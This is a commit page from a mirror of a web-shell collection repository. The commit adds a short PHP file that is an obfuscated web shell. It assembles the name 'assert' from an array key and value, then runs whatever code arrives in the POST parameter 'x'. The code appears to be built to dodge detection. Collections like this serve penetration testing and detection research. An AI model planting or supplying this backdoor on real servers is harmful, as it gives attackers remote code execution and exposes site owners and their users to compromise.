mirror of
https://github.com/tennc/webshell
synced 2024-11-22 03:03:03 +00:00
Create 2020.08.20.12.php
from : https://www.sqlsec.com/2020/07/shell.html
This commit is contained in:
parent
f7c1551c7f
commit
aeb2db1e19
1 changed files with 9 additions and 0 deletions
9
php/2020.08.20.12.php
Normal file
9
php/2020.08.20.12.php
Normal file
|
@ -0,0 +1,9 @@
|
|||
<?php
|
||||
function sqlsec($value,$key)
|
||||
{
|
||||
$x = $key.$value;
|
||||
$x($_POST['x']);
|
||||
}
|
||||
$a=array("ass"=>"ert");
|
||||
array_walk($a,"sqlsec");
|
||||
?>
|
Loading…
Reference in a new issue